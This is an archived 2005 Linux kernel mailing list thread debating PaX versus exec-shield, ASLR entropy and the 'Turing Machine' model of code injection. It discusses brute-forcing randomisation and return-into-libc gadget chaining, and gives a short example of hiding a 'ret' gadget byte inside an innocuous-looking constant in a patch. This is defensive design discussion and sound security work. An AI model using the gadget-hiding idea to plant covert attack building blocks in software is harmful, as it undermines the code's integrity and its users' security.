> stop exploits of memory corruption bugs, they enforce least privilege
> (to whatever degree). [...]

well, SELinux can be helpful in limiting dlopen() access - and if a
context can do no valid dlopen() (due to SELinux restrictions) then the
stacks don't need to be made executable either.

> [...] the danger of relying on access control under Exec-Shield is
> that once an attacker can execute his own code on the target system
> (ESploit shows how), all it takes is a single exploitable kernel bug
> and he's in for good. and as the past months have shown, such bugs are
> not exactly unheard of in linux land.

so ... in what way does PaX protect against all possible types of
'arbitrary code execution', via the exploit techniques i outlined in
the previous mail?

> > such an attack needs to get 2 or 3 random values right - which,
> > considering 13-bits randomization per value is still 26-39 bits (minus
> > the constant number of bits you can get away via replication).
>
> the maths doesn't quite work that way. what matters is not how many
> random values you have to get right, but how much entropy you have to
> get right. [...]

the example in that case was libc, heap and stack, which are
independent random variables and hence their entropy adds up. Once
there's any coupling between two addresses, only the independent bits
(if any) add up.
> i'd also add that all this number juggling becomes worthless if
> information can be leaked from the attacked task.

yes, information leaks can defeat ASLR, and it obviously affects PaX
just as much.

> so the maths under Exec-Shield would be 12+16 bits or so, if i'm not
> mistaken. [...]

that's what i said too: 13+13 [to stay simple], or 13+13+13 if the heap
is involved too.

> the paper i linked to in my first post in this thread shows you a
> technique that can find out the libc randomization without having to
> learn the stack one.
>
> that technique is neither new nor the only one that can do this. to
> your defense, i'd held this belief 3 years ago too (i.e., that
> randomness of different areas would have to be guessed at once) but
> for some time i'm much less sure that it's a useful generic
> assumption.

if you have a fork() based daemon (e.g. httpd) that will tolerate
brute-force attacks then indeed you can 'probe' individual address
components and reduce an N*M attack to N+M. and there are techniques
against this: e.g. sshd already re-execs itself periodically. (i'm not
sure about httpd, if it doesn't then it should too.)

> > If the stack wasn't nonexec then the attack would need to get only
> > 1 random value right. In that sense it still makes quite a difference
> > in increasing the complexity of the attack, do you agree?
>
> based on the above explanation of what i know, i don't agree *in
> general*, it has to be rather a special case when one really has to
> guess different randomizations at once (again, unless proven
> otherwise, i'll assume the worst case).

well, in the worst case you have a big fat information leak that gives
you all the address-space details. According to this logic it makes no
sense to even think about ASLR, right? ;)

> on another note, increasing the complexity of exploits this way is not
> a good idea if you want the slightest security guarantees for your
> system.
> the problem is that without a crash monitoring/reaction
> mechanism one can just happily keep trying and eventually get in -
> what is the point then?

there are no guarantees whatsoever, if a C-style application gets
overflown on the stack! (except some rare, very degenerate cases)

> in the PaX strategy the reason for using randomization is that we
> can't do much (yet) against the two other classes of exploit
> techniques [...]

they are not 'two other classes of exploit techniques'. Your
categorization is a low-level one centered around machine code:

 (1) introduce/execute arbitrary code
 (2) execute existing code out of original program order
 (3) execute existing code in original program order with arbitrary data

these are variations of one and the same thing: injecting code into a
Turing machine. I'm not sure why you are handling the execution of
arbitrary code (which in your case, wants to mean 'arbitrary machine
code') in any way different from 'execute existing code out of original
program order'. A chain of libc functions put on the stack _is_ new
code for all practical purposes. And as you've mentioned it earlier
too, there are 'suitable' byte patterns in a lot of common binaries,
which you can slice & dice together to build something useful.

trying to put some artificial barrier between 'arbitrary machine code'
and 'arbitrary interpreted code' is just semantics, it doesn't change
the fundamental fact that all of that is arbitrary program logic,
caused by arbitrary bytes being passed in to the function stack.
Attackers will pick whichever method is easier, not whichever method is
'more native'!

> [...] plus it's a cheap measure, so 'why not'. [...]

(btw., wasting 128 MB of the x86 stack on average is all but 'cheap')

> [...] but it's not a security measure in the sense that controlling
> runtime code generation is. in other words, the security guarantee
> that PaX gives doesn't rely on randomization, [...]
the data passed into a stack overflow is, by itself, without compiler
help, 'arbitrary runtime code' in a form. You only have to find or
construct the right interpreter for it. So to talk about any 'security
guarantee' in such a scenario is pointless.

> even with crash monitoring/reaction one can only claim a
> 'probabilistic guarantee', something that's not always good enough

i claim that 'arbitrary stack overflows', without compiler help, can
only be protected against in a probabilistic way.

> > As you can see on lkml, people are resisting changes hard that
> > affect 2-3 apps. What chances do changes have that break dozens of
> > common applications?
>
> i don't see your dilemma. having the ability to control runtime code
> generation (making it a privilege, instead of a given) [...]

so ... how do you define 'runtime code generation', and why do you
exclude non-native execution methods, precisely? I still claim it
cannot be deterministically controlled as a whole, so it is of no
significance to the security guarantees of the system whether the
native portion is controlled deterministically or not. (because there
are no guarantees for this one.)

The rest of your mail centers around this contention that 'code
generation' is equivalent to 'binary machine code injection' and can
thus be controlled; so until this fundamental issue is cleared it makes
little sense to answer the other 'when did you stop beating your wife'
questions :-)

	Ingo

^ permalink raw reply	[flat|nested] 26+ messages in thread
* Re: Sabotaged PaXtest (was: Re: Patch 4/6 randomize the stack pointer)
  2005-02-07 14:23       ` pageexec
  2005-02-07 21:08         ` Ingo Molnar
@ 2005-02-07 22:36         ` Ingo Molnar
  2005-02-08 12:27           ` pageexec
  1 sibling, 1 reply; 26+ messages in thread
From: Ingo Molnar @ 2005-02-07 22:36 UTC (permalink / raw)
To: pageexec; +Cc: linux-kernel, Arjan van de Ven, Theodore Ts'o

btw., do you consider PaX as a 100% sure solution against 'code
injection' attacks (meaning that the attacker wants to execute an
arbitrary piece of code, and assuming the attacked application has a
stack overflow)? I.e. does PaX avoid all such attacks in a guaranteed
way?

	Ingo

^ permalink raw reply	[flat|nested] 26+ messages in thread
* Re: Sabotaged PaXtest (was: Re: Patch 4/6 randomize the stack pointer)
  2005-02-07 22:36         ` Ingo Molnar
@ 2005-02-08 12:27           ` pageexec
  2005-02-08 13:41             ` Ingo Molnar
  2005-02-08 16:48             ` the "Turing Attack" (was: Sabotaged PaXtest) Ingo Molnar
  0 siblings, 2 replies; 26+ messages in thread
From: pageexec @ 2005-02-08 12:27 UTC (permalink / raw)
To: Ingo Molnar; +Cc: linux-kernel, Arjan van de Ven, Theodore Ts'o

> btw., do you consider PaX as a 100% sure solution against 'code
> injection' attacks (meaning that the attacker wants to execute an
> arbitrary piece of code, and assuming the attacked application has a
> stack overflow)? I.e. does PaX avoid all such attacks in a guaranteed
> way?

your question is answered in http://pax.grsecurity.net/docs/pax.txt
that i suggested you read over a year ago. the short answer is that
it's not only about stack overflows but any kind of memory corruption
bugs, and you need both a properly configured kernel (for PaX/i386 that
would be SEGMEXEC/MPROTECT/NOELFRELOCS) and an access control system
(to take care of the file system and file mappings) and a properly
prepared userland (e.g., no text relocations in ELF executables/libs,
which is a good thing anyway).

^ permalink raw reply	[flat|nested] 26+ messages in thread
* Re: Sabotaged PaXtest (was: Re: Patch 4/6 randomize the stack pointer)
  2005-02-08 12:27           ` pageexec
@ 2005-02-08 13:41             ` Ingo Molnar
  2005-02-08 14:25               ` Julien TINNES
  0 siblings, 1 reply; 26+ messages in thread
From: Ingo Molnar @ 2005-02-08 13:41 UTC (permalink / raw)
To: pageexec; +Cc: linux-kernel, Arjan van de Ven, Theodore Ts'o

* pageexec@freemail.hu <pageexec@freemail.hu> wrote:

> > btw., do you consider PaX as a 100% sure solution against 'code
> > injection' attacks (meaning that the attacker wants to execute an
> > arbitrary piece of code, and assuming the attacked application has a
> > stack overflow)? I.e. does PaX avoid all such attacks in a guaranteed
> > way?
>
> your question is answered in http://pax.grsecurity.net/docs/pax.txt
> that i suggested you to read over a year ago. the short answer is that
> it's not only about stack overflows but any kind of memory corruption
> bugs, and you need both a properly configured kernel (for PaX/i386
> that would be SEGMEXEC/MPROTECT/NOELFRELOCS) and an access control
> system (to take care of the file system and file mappings) and a
> properly prepared userland (e.g., no text relocations in ELF
> executables/libs, which is a good thing anyway).

i'm just curious, assuming that all those conditions are true, do you
consider PaX a 100% sure solution against 'code injection' attacks?
(assuming that the above PaX and access-control feature implementations
are correct.) Do you think the upstream kernel could/should integrate
it as a solution against code injection attacks?

	Ingo

^ permalink raw reply	[flat|nested] 26+ messages in thread
* Re: Sabotaged PaXtest (was: Re: Patch 4/6 randomize the stack pointer)
  2005-02-08 13:41             ` Ingo Molnar
@ 2005-02-08 14:25               ` Julien TINNES
  2005-02-08 16:56                 ` Ingo Molnar
  0 siblings, 1 reply; 26+ messages in thread
From: Julien TINNES @ 2005-02-08 14:25 UTC (permalink / raw)
To: Ingo Molnar; +Cc: linux-kernel, Arjan van de Ven, Theodore Ts'o

> i'm just curious, assuming that all those conditions are true, do you
> consider PaX a 100% sure solution against 'code injection' attacks?
> (assuming that the above PaX and access-control feature implementations
> are correct.) Do you think the upstream kernel could/should integrate it
> as a solution against code injection attacks?
>
> Ingo

It depends on what you call 'code injection'.

- If code injection is the introduction of a new piece of directly
  executable-by-processor opcodes (I exclude interpreted code here)
  into a running process:

  1. If you trust the Linux kernel, your processor, etc.
  2. If you have a non-executable pages semantics implementation
  3. If you have a restriction preventing PROT_EXEC|PROT_WRITE mappings
     from existing and any new PROT_EXEC mapping (meaning giving an
     existing mapping PROT_EXEC or creating a new PROT_EXEC mapping)
     from being created.

  then the answer is yes. PaX does 2 fully, and 3 partially:

  - It doesn't prevent executable file mappings (an access control
    system must)
  - .text relocations are detected and permitted if the option is
    enabled (necessary if you don't have PIC code)
  - there is an option that can be enabled to emulate trampolines

But if you consider code injection as in your previous post:

> btw., do you consider PaX as a 100% sure solution against 'code
> injection' attacks (meaning that the attacker wants to execute an
> arbitrary piece of code, and assuming the attacked application has a
> stack overflow)? I.e. does PaX avoid all such attacks in a guaranteed
> way?
then the answer to your question is no, because a stack overflow
usually allows two things: injection of new code, and execution flow
redirection. While the former is prevented, the latter is not, and the
attacker could use chaining techniques as in [1] to execute "arbitrary
code" (but not directly as an arbitrary, newly injected sequence of
opcodes). Address space obfuscation (address space layout randomization
is one way) makes it harder (but not impossible, esp. if you don't have
anything preventing the attacker from bruteforcing...) to use existing
code.

[1]: Nergal, Advanced return-into-lib(c)
     http://www.phrack.org/show.php?p=58&a=4

-- 
Julien TINNES - & france telecom - R&D Division/MAPS/NSS
Research Engineer - Internet/Intranet Security
GPG: C050 EF1A 2919 FD87 57C4 DEDD E778 A9F0 14B9 C7D6

^ permalink raw reply	[flat|nested] 26+ messages in thread
* Re: Sabotaged PaXtest (was: Re: Patch 4/6 randomize the stack pointer)
  2005-02-08 14:25               ` Julien TINNES
@ 2005-02-08 16:56                 ` Ingo Molnar
  0 siblings, 0 replies; 26+ messages in thread
From: Ingo Molnar @ 2005-02-08 16:56 UTC (permalink / raw)
To: Julien TINNES; +Cc: linux-kernel, Arjan van de Ven, Theodore Ts'o

* Julien TINNES <julien.tinnes.NOSPAM@francetelecom.REMOVE.com> wrote:

> But if you consider code injection as in your previous post:
>
> > btw., do you consider PaX as a 100% sure solution against 'code
> > injection' attacks (meaning that the attacker wants to execute an
> > arbitrary piece of code, and assuming the attacked application has a
> > stack overflow)? I.e. does PaX avoid all such attacks in a guaranteed
> > way?
>
> then the answer to your question is no because a stack overflow
> usually allows two things: injection of new code, and execution flow
> redirection. While the former is prevented, the latter is not and the
> attacker could use chaining techniques as in [1] to execute "arbitrary
> code" (but not directly as an arbitrary, newly injected sequence of
> opcodes). Address space obfuscation (address space layout
> randomization is one way) is making it harder (but not impossible,
> esp. if you don't have anything preventing the attacker from
> bruteforcing...) to use existing code.

precisely my point (see my previous, very long post). obviously it's
not us who define what 'code injection' is but the laws of physics and
the laws of computer science. Restricting to the native CPU's machine
code format may cover an important special case, but it will prevent
arbitrary code execution just as much as a house that has a locked door
but an open window, where the owner defines "burglary" as "the bad guy
tries to open the door". Correct in a sense, but not secure in a
guaranteed way :-|

	Ingo

^ permalink raw reply	[flat|nested] 26+ messages in thread
* the "Turing Attack" (was: Sabotaged PaXtest)
  2005-02-08 12:27           ` pageexec
  2005-02-08 13:41             ` Ingo Molnar
@ 2005-02-08 16:48             ` Ingo Molnar
  2005-02-08 22:08               ` Ingo Molnar
  2005-02-08 22:41               ` H. Peter Anvin
  1 sibling, 2 replies; 26+ messages in thread
From: Ingo Molnar @ 2005-02-08 16:48 UTC (permalink / raw)
To: pageexec; +Cc: linux-kernel, Arjan van de Ven, Theodore Ts'o

* pageexec@freemail.hu <pageexec@freemail.hu> wrote:

> > btw., do you consider PaX as a 100% sure solution against 'code
> > injection' attacks (meaning that the attacker wants to execute an
> > arbitrary piece of code, and assuming the attacked application has a
> > stack overflow)? I.e. does PaX avoid all such attacks in a guaranteed
> > way?
>
> your question is answered in http://pax.grsecurity.net/docs/pax.txt

the problem is - your answer in that document is i believe wrong, in
subtle and less subtle ways as well. In particular, let's take a look
at the more detailed PaX description in:

  http://pax.grsecurity.net/docs/pax-future.txt

    To understand the future direction of PaX, let's summarize what we
    achieve currently. The goal is to prevent/detect exploiting of
    software bugs that allow arbitrary read/write access to the
    attacked process. Exploiting such bugs gives the attacker three
    different levels of access into the life of the attacked process:

    (1) introduce/execute arbitrary code
    (2) execute existing code out of original program order
    (3) execute existing code in original program order with arbitrary
        data

    Non-executable pages (NOEXEC) and mmap/mprotect restrictions
    (MPROTECT) prevent (1) with one exception: if the attacker is able
    to create/write to a file on the target system then mmap() it into
    the attacked process then he will have effectively introduced and
    executed arbitrary code. [...]

the blanket statement in this last paragraph is simply wrong, as it
omits to mention a number of other ways in which "code" can be
injected.
( there is no formal threat model (== structured document defining
types of attacks and conditions under which they occur) described on
those webpages, but the above quote comes closest as a summary, wrt.
the topic of code injection via overflows. )

firstly, let me outline what i believe the correct threat model is that
covers all overflow-based code injection threats, in a very simplified
sentence:

-----------------------------------------------------------------
" the attacker wants to inject arbitrary code into a sufficiently
  capable (finite) Turing Machine on the attacked system, via
  overflows. "
-----------------------------------------------------------------

as you can see from the formulation, this is a pretty generic model,
that covers all conceivable forms of 'code injection' attacks - which
makes it a natural choice to use. (A finite Turing Machine here is a
"state machine with memory attached and code pre-defined". I.e. a
simple CPU, memory and code.)

a number of different types of Turing Machines may exist on any given
target system:

 (1) Native Turing Machines
 (2) Intentional Turing Machines
 (3) Accidental Turing Machines
 (4) Malicious Turing Machines

each type of machine can be attacked, and the end result is always the
same: the attacker uses the capabilities of the attacked application
for his own purposes. (== injects code)

i'll first go through them one by one, in more detail. After that i'll
talk about what i see as the consequences of this threat model and how
it applies to the subject at hand, to PaX and to exec-shield.

1) Native Turing Machines
-------------------------

this is the most commonly used and attacked (but by no means exclusive)
type: machine code interpreted by a CPU. Note: 'CPU' does not
necessarily mean the _host CPU_, it could easily mean code
interpretation done by a graphics CPU or a firmware CPU.
( Note: 'machine code' does not necessarily mean that the typical
operation mode of the host CPU is attacked: there are many CPUs that
support multiple instruction set architectures. E.g. x86 CPUs support
16-bit and 32-bit code as well, and x64 in fact supports 3 modes:
64-bit, 32-bit and 16-bit code too. Depending on the type of
application vulnerability, an attack may want to utilize a different
type of ISA than the most common one, to minimize the complexity needed
to utilize the Turing Machine. )

2) Intentional Turing Machines
------------------------------

these are pretty commonly used too: "software CPUs" in essence, e.g.
script interpreters, virtual machines and CPU emulators. There are also
forms of code which one might not recognize as a Turing Machine:
parsers of some of the more capable configuration files.

in no case must these Turing Machines be handled in any way different
from 'native binary code' - all that matters is the capabilities and
attackability of the Turing Machine, not its implementation! (E.g. an
attack might go against a system that itself is running on an emulated
CPU - in that case the attacker is up against an 'interpreter', not a
real native CPU.)

Note that such interpreters/machines, since implemented within a binary
or library, can very often be used from within the process image via
ret2libc methods, so they are not controllable via 'access control'
means.

( Note that e.g. the sendmail.cf configuration language is a
Turing-complete script language, with the interpreter code included in
the sendmail binary. Someone once wrote a game of Hanoi in the
sendmail.cf language ...
)

3) Accidental Turing Machines
-----------------------------

the simplest form of Accidental Turing Machines seems purely
theoretical:

" what if the binary code of an application happens to include a byte
  sequence in its executable code section, that if jumped to implements
  a Turing Machine that the application writer did not intend to put
  there, that an attacker can pass arbitrary instructions to. "

This, on the face of it, seems like a ridiculous possibility, as the
chances of that are inversely proportional to the number of bits
necessary to implement the simplest Turing Machine. (which for anything
even closely usable is on the order of 2^10000, less likely than the
likelihood of us all living to the end of the Universe.)

but that chance calculation assumes that the Turing Machine is
implemented as one block of native code. What happens if the Turing
Machine is 'pieced together', from very small 'building blocks of
code'?

this may still seem unlikely, but depending on the instruction format
of the native machine code, it can become possible. In particular: on
CISC CPUs with variable length instructions, the number of 'possible
instructions' is larger (and much more varied) than the number, type
and combination of actual instructions in the libraries/binaries, and
the type of instructions is very rich as well - giving more chance to
the attacker to find the right 'building blocks' for a "sufficiently
capable Turing Machine".

The most extreme modern example of CISC is x86, where 99% of all byte
values can be the beginning of a valid instruction, and more than 95%
of byte positions within binary code are interpretable by the CPU
without faulting. (This means that e.g. in a 1.5 MB Linux kernel image,
there are over 800 thousand instructions - but the number of possible
instruction addresses is nearly 1.5 million.) Furthermore, on x86, a
key instruction, 'ret', is encoded via a single byte (0xc3).
This means that if a stack overflow allows an arbitrary jump to an
arbitrary code address, all you have to do to 'build' a Turing Machine
is to find the right type of instruction followed by a single-byte
'ret' instruction. A handful of operations will do to construct one.
I'm not aware of anyone having done such a machine as proof-of-concept,
but fundamentally the 'chain of functions called' techniques used in
ret2libc exploits (also used in your example) are amongst the basic
building blocks of a 'Stack Based Turing Machine'.

Note that time works in favor of Accidental Turing Machines: the size
of application code and library code grows, so the chance to find the
basic building blocks increases as well.

also note that it's impossible to prove for a typical application that
_no_ Accidental Turing Machine can be built out of a stack overflow on
x86. So no protection measure can claim to _100%_ protect against
Accidental Turing Machines, without analysing each and every
application and making sure that _no_ Turing Machine could ever be
built out of it!

let's go back to the PaX categorization briefly, and check out how the
categories relate to Accidental Turing Machines:

 (1) introduce/execute arbitrary code
 (2) execute existing code out of original program order
 (3) execute existing code in original program order with arbitrary data

#2 (or #3) can be used as the basic building block for an Accidental
Turing Machine, and can thus be turned back into #1. So #1 overlaps
with #2, #3 and thus makes little sense in isolation - only if you
restrict the categories to cover 'native, binary machine code' - but
such a restriction would make little sense, as the format and encoding
of code doesn't matter, it's the 'arbitrary programming' that must be
prevented!

in fact, #2, #3 are just limited aspects of "Accidental Turing
Machines": trying to use existing code sequences in a way to form the
functionality the attacker wants.
4) Malicious Turing Machines
----------------------------

given the complexity of the x86 instruction format, a malicious
attacker could conceivably inject Turing Machine building blocks into
seemingly unrelated functions as well, hidden in innocuous-looking
patches. E.g. this innocuous-looking code:

	#define MAGIC	0xdeadc300

	assert(data->field == MAGIC);

injects a hidden 'ret' into the code - while the application uses that
byte as a constant! Choosing the right kind of code, you can inject
arbitrary building blocks without them ever having any functionality in
the original (intended) instruction stream! Since most x86-ish CPUs do
not enforce 'intended instruction boundaries', attacks like this are
possible.

Threat Analysis
---------------

the current techniques of PaX protect against the injection of code
into Native Turing Machines of the Host CPU, but PaX does not prevent
code injection into the other types of Turing Machines.

A number of common examples of Intentional Turing Machines in commonly
attacked applications: the Apache modules PHP, perl, fastcgi, python,
etc., or sendmail's sendmail.cf interpreter. Another, less known
example of Turing Machines are interpreters within the kernel: e.g. the
ACPI interpreter. (In fact there have been a number of patches/ideas
that introduce Universal Turing Machines into the kernel, so the trend
is that the kernel will get _multiple_ Turing Machines.)

Furthermore, if there's _any_ DSO on the system that has any
implementation of a Turing Machine (either a sufficiently capable
interpreter, or any virtual machine), that is dlopen()-able by the
attacked application, then that may be used for the attack too. (Yes,
you could avoid this via access control means, but that really flouts
the problem at hand.)
Plus, even if all intentional Turing Machines are removed from the
system (try that in practice!), and an application can dlopen() random,
unrelated DSOs, it can thus still increase the chances of finding the
building blocks for an Accidental (or Malicious) Turing Machine by
dlopen()-ing them.

PaX does nothing (simply because it cannot) against most types of
Intentional, Accidental or Malicious Turing Machines. (interesting
detail: PaX doesn't fully cover all types of Native Turing Machines.)

a more benign detail: while the above techniques are all concentrated
on 'process-internal' execution strategies, i consider this exclusion
of process-external execution an arbitrary restriction of the PaX
threat model as well. 'excluding' external interpreters from the threat
model is impractically restrictive. It may be a less dangerous attack
for some threats (because it most likely won't run under the same high
privileges as the attacked app), but it's still a dangerous category
that should be considered in companion to "process internal" attacks.

Conclusion
----------

arbitrary-write attacks against the native function stack, on x86,
cannot be protected against in a sure way, after the fact. Neither PaX
nor exec-shield can do it - and in that sense PaX's "we solved this
problem" stance is more dangerous, because it creates a false sense of
security. With exec-shield you at least know that there are limitations
and tradeoffs.

some of the overflows can be protected against 'before the fact' - in
gcc and glibc in particular. You've mentioned FORTIFY_SOURCE before too
(an upcoming feature of Fedora Core 4), and much more can be done.
Also, type-safe languages are much more robust against such types of
bugs.
So i consider PaX and exec-shield conceptually equivalent in the grand scheme of code injection attacks: neither of them 'solves' the (unsolvable) problem in a 100% way, neither of them 'guarantees' anything about security (other than irrelevant special cases), but both try to implement defenses, with a different achieved threshold of 'required minimum complexity of an attack to succeed'. To repeat: 100% protection against code injection cannot be achieved.

The intentional tradeoffs exec-shield makes have been discussed in great detail, and while i give you the benefit of the doubt (and myself the possibility of flawed thinking), it might well be the right time for you to double-check your own thinking wrt. PaX. And you should at minimum accurately document that PaX only tries to deal with injection of native binary code, and that there are a number of other ways to inject external code into an application.

	Ingo

^ permalink raw reply	[flat|nested] 26+ messages in thread
* Re: the "Turing Attack" (was: Sabotaged PaXtest)
  2005-02-08 16:48 ` the "Turing Attack" (was: Sabotaged PaXtest) Ingo Molnar
@ 2005-02-08 22:08 ` Ingo Molnar
  2005-02-10 13:43   ` Ingo Molnar
  2005-02-08 22:41 ` H. Peter Anvin
  1 sibling, 1 reply; 26+ messages in thread
From: Ingo Molnar @ 2005-02-08 22:08 UTC (permalink / raw)
To: pageexec; +Cc: linux-kernel, Arjan van de Ven, Theodore Ts'o

* Ingo Molnar <mingo@elte.hu> wrote:

> http://pax.grsecurity.net/docs/pax-future.txt
>
> To understand the future direction of PaX, let's summarize what we
> achieve currently. The goal is to prevent/detect exploiting of
> software bugs that allow arbitrary read/write access to the attacked
> process. Exploiting such bugs gives the attacker three different
> levels of access into the life of the attacked process:
>
> (1) introduce/execute arbitrary code
> (2) execute existing code out of original program order
> (3) execute existing code in original program order with arbitrary
>     data
>
> Non-executable pages (NOEXEC) and mmap/mprotect restrictions
> (MPROTECT) prevent (1) with one exception: if the attacker is able to
> create/write to a file on the target system and then mmap() it into the
> attacked process, then he will have effectively introduced and
> executed arbitrary code.
> [...]
>
> the blanket statement in this last paragraph is simply wrong, as it
> omits to mention a number of other ways in which "code" can be
> injected.

i'd like to correct this sentence of mine, because it's unfair: your categories are consistent if you define 'code' as 'machine code', and it's clear from your documents that you mean 'machine code' under 'code'. (My other criticism remains.)

	Ingo

^ permalink raw reply	[flat|nested] 26+ messages in thread
* Re: the "Turing Attack" (was: Sabotaged PaXtest)
  2005-02-08 22:08 ` Ingo Molnar
@ 2005-02-10 13:43   ` Ingo Molnar
  2005-02-10 13:58     ` Jakob Oestergaard
  0 siblings, 1 reply; 26+ messages in thread
From: Ingo Molnar @ 2005-02-10 13:43 UTC (permalink / raw)
To: pageexec; +Cc: linux-kernel, Arjan van de Ven, Theodore Ts'o

* pageexec@freemail.hu <pageexec@freemail.hu> wrote:

> the bigger problem is however that you're once again fixing the
> symptoms, instead of the underlying problem - not the correct
> approach/mindset.

i'll change my approach/mindset when it is proven that "the underlying problem" can be solved. (in a deterministic fashion)

in case you don't accept the threat model i outlined (the [almost-Universal] Turing Machine approach), here are the same fundamental arguments, applied to the PaX threat model.

first, about the basic threat itself: it comes from some sort of memory overwrite condition that an attacker can control - we assume the worst case, that the attacker has arbitrary read/write access to the writable portions of the attacked task's address space. [this threat arises out of some sort of memory overwrite flaw most of the time.]

you are splitting the possible effects of a given specific threat into 3 categories:

 (1) introduce/execute arbitrary [native] code
 (2) execute existing code out of original program order
 (3) execute existing code in original program order with arbitrary
     data

then you are building defenses against each category. You say that PaX covers (1) deterministically, while exec-shield only adds probabilistic defenses (which i agree with). You furthermore say (in your docs) that PaX (currently) offers probabilistic defenses against (2) and (3). You furthermore document that (2) and (3) can likely only be defended against probabilistically.
i hope we are in agreement so far, and here comes the point where i believe our opinions diverge: i say that if _any_ aspect of a given specific threat is handled in a probabilistic way, the whole defense mechanism is still only probabilistic!

in other words: unless you have a clear plan to turn PaX into a deterministic defense against the specific threat outlined above, it is just as probabilistic (clearly with better entropy) as exec-shield. PaX cannot be a 'little bit pregnant'. (you might argue that exec-shield is in the 6th month, but that does not change the fundamental end result: a child will be born ;-)

you cannot just isolate a given attack type ('exploit class'), call PaX deterministic and trumpet a security guarantee - since what matters from a security-guarantee point of view is the actions of the *attacker*: _can_ the attacker mount a successful attack or not, given a specific threat? If he can never mount a successful attack (using a specific flaw) then the defense is deterministic. If there is an exploit class that can be successful then the defense is probabilistic. (or nonexistent)

Defending only against a class of exploits (applied to the specific threat) will force attackers towards the remaining areas - but if those remaining areas cannot be defended against for sure, then you cannot say that PaX offers a security guarantee against that specific threat. Talking about security guarantees against 'sub-threats' does not make sense, because attackers don't do us the favor of using only one class of attacks.

and once we are in the land of probabilistic defenses, it's the weakest link that matters. It might make sense to handle the 'native code injection' portion of the threat in a deterministic way, but only as a tool to drive attackers towards vectors that are less probable - it is not in any way a security guarantee.

	Ingo

^ permalink raw reply	[flat|nested] 26+ messages in thread
* Re: the "Turing Attack" (was: Sabotaged PaXtest) 2005-02-10 13:43 ` Ingo Molnar @ 2005-02-10 13:58 ` Jakob Oestergaard 2005-02-10 15:21 ` Ingo Molnar 0 siblings, 1 reply; 26+ messages in thread From: Jakob Oestergaard @ 2005-02-10 13:58 UTC (permalink / raw) To: Ingo Molnar; +Cc: pageexec, linux-kernel, Arjan van de Ven, Theodore Ts'o On Thu, Feb 10, 2005 at 02:43:14PM +0100, Ingo Molnar wrote: > > * pageexec@freemail.hu <pageexec@freemail.hu> wrote: > > > the bigger problem is however that you're once again fixing the > > symptoms, instead of the underlying problem - not the correct > > approach/mindset. > > i'll change my approach/mindset when it is proven that "the underlying > problem" can be solved. (in a deterministic fashion) I know neither exec-shield nor PaX and therefore have no bias or preference - I thought I should chirp in on your comment here Ingo... ... > PaX cannot be a 'little bit pregnant'. (you might argue that exec-shield > is in the 6th month, but that does not change the fundamental > end-result: a child will be born ;-) Yes and no. I would think that the chances of a child being born are greater if the pregnancy has lasted successfully up until the 6th month, compared to a first week pregnancy. I assume you get my point :) -- / jakob ^ permalink raw reply [flat|nested] 26+ messages in thread
* Re: the "Turing Attack" (was: Sabotaged PaXtest) 2005-02-10 13:58 ` Jakob Oestergaard @ 2005-02-10 15:21 ` Ingo Molnar 2005-02-10 20:03 ` David Weinehall 0 siblings, 1 reply; 26+ messages in thread From: Ingo Molnar @ 2005-02-10 15:21 UTC (permalink / raw) To: Jakob Oestergaard, pageexec, linux-kernel, Arjan van de Ven, Theodore Ts'o * Jakob Oestergaard <jakob@unthought.net> wrote: > On Thu, Feb 10, 2005 at 02:43:14PM +0100, Ingo Molnar wrote: > > > > * pageexec@freemail.hu <pageexec@freemail.hu> wrote: > > > > > the bigger problem is however that you're once again fixing the > > > symptoms, instead of the underlying problem - not the correct > > > approach/mindset. > > > > i'll change my approach/mindset when it is proven that "the underlying > > problem" can be solved. (in a deterministic fashion) > > I know neither exec-shield nor PaX and therefore have no bias or > preference - I thought I should chirp in on your comment here Ingo... > > ... > > PaX cannot be a 'little bit pregnant'. (you might argue that exec-shield > > is in the 6th month, but that does not change the fundamental > > end-result: a child will be born ;-) > > Yes and no. I would think that the chances of a child being born are > greater if the pregnancy has lasted successfully up until the 6th month, > compared to a first week pregnancy. > > I assume you get my point :) the important point is: neither PaX nor exec-shield can claim _for sure_ that no child will be born, and neither can claim virginity ;-) [ but i guess there's a point where a bad analogy must stop ;) ] Ingo ^ permalink raw reply [flat|nested] 26+ messages in thread
* Re: the "Turing Attack" (was: Sabotaged PaXtest) 2005-02-10 15:21 ` Ingo Molnar @ 2005-02-10 20:03 ` David Weinehall 2005-02-11 8:51 ` Mika Bostrom 0 siblings, 1 reply; 26+ messages in thread From: David Weinehall @ 2005-02-10 20:03 UTC (permalink / raw) To: Ingo Molnar Cc: Jakob Oestergaard, pageexec, linux-kernel, Arjan van de Ven, Theodore Ts'o On Thu, Feb 10, 2005 at 04:21:49PM +0100, Ingo Molnar wrote: > > * Jakob Oestergaard <jakob@unthought.net> wrote: > > > On Thu, Feb 10, 2005 at 02:43:14PM +0100, Ingo Molnar wrote: > > > > > > * pageexec@freemail.hu <pageexec@freemail.hu> wrote: > > > > > > > the bigger problem is however that you're once again fixing the > > > > symptoms, instead of the underlying problem - not the correct > > > > approach/mindset. > > > > > > i'll change my approach/mindset when it is proven that "the underlying > > > problem" can be solved. (in a deterministic fashion) > > > > I know neither exec-shield nor PaX and therefore have no bias or > > preference - I thought I should chirp in on your comment here Ingo... > > > > ... > > > PaX cannot be a 'little bit pregnant'. (you might argue that exec-shield > > > is in the 6th month, but that does not change the fundamental > > > end-result: a child will be born ;-) > > > > Yes and no. I would think that the chances of a child being born are > > greater if the pregnancy has lasted successfully up until the 6th month, > > compared to a first week pregnancy. > > > > I assume you get my point :) > > the important point is: neither PaX nor exec-shield can claim _for sure_ > that no child will be born, and neither can claim virginity ;-) > > [ but i guess there's a point where a bad analogy must stop ;) ] Yeah, sex is *usually* a much more pleasant experience than having your machine broken into, even if it results in a pregnancy. 
=) Regards: David -- /) David Weinehall <tao@acc.umu.se> /) Northern lights wander (\ // Maintainer of the v2.0 kernel // Dance across the winter sky // \) http://www.acc.umu.se/~tao/ (/ Full colour fire (/ ^ permalink raw reply [flat|nested] 26+ messages in thread
